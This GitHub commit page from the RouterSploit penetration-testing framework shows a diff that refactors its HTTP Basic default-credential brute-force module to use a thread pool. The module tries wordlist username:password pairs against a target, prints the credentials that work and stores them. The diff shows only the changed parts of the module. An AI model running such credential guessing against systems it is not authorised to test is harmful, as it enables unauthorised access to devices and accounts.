Skip to content

Commit

Permalink
Refactoring creds/http_basic_default with ThreadPoolExecutor.
Browse files Browse the repository at this point in the history
  • Loading branch information
@fwkz
fwkz committed Aug 10, 2016
1 parent 02355bc commit a8c5cb0
Showing 1 changed file with 22 additions and 28 deletions.
50 changes: 22 additions & 28 deletions routersploit/modules/creds/http_basic_default.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -5,15 +5,17 @@
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
sanitize_url,
boolify,
http_request,
multi,
validators,
)

from routersploit.exceptions import StopThreadPoolExecutor
from routersploit.threads import ThreadPoolExecutor


class Exploit(exploits.Exploit):
"""
Expand All @@ -35,7 +37,7 @@ class Exploit(exploits.Exploit):
],
}

target = exploits.Option('', 'Target IP address or file with target:port (file://)')
target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Number of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
Expand All @@ -51,7 +53,7 @@ def run(self):

@multi
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
url = "{}:{}{}".format(self.target, self.port, self.path)

response = http_request("GET", url)
if response is None:
Expand All @@ -66,8 +68,10 @@ def attack(self):
else:
defaults = [self.defaults]

collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
with ThreadPoolExecutor(self.threads) as executor:
for record in defaults:
username, password = record.split(':')
executor.submit(self.target_function, username, password)

if self.credentials:
print_success("Credentials found!")
Expand All @@ -78,30 +82,20 @@ def attack(self):

defaults.close()

def target_function(self, running, data):
def target_function(self, user, password):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))

print_status(name, 'process is starting...', verbose=module_verbosity)

while running.is_set():
try:
line = data.next().split(":")
user = line[0].encode('utf-8').strip()
password = line[1].encode('utf-8').strip()
url = "{}:{}{}".format(self.target, self.port, self.path)

response = http_request(method="GET", url=url, auth=(user, password))
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()

if response.status_code != 401:
if boolify(self.stop_on_success):
running.clear()
response = http_request(method="GET", url=url, auth=(user, password))

print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
except StopIteration:
break

print_status(name, 'process is terminated.', verbose=module_verbosity)
if response.status_code != 401:
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
if boolify(self.stop_on_success):
raise StopThreadPoolExecutor
else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)

0 comments on commit a8c5cb0

Please sign in to comment.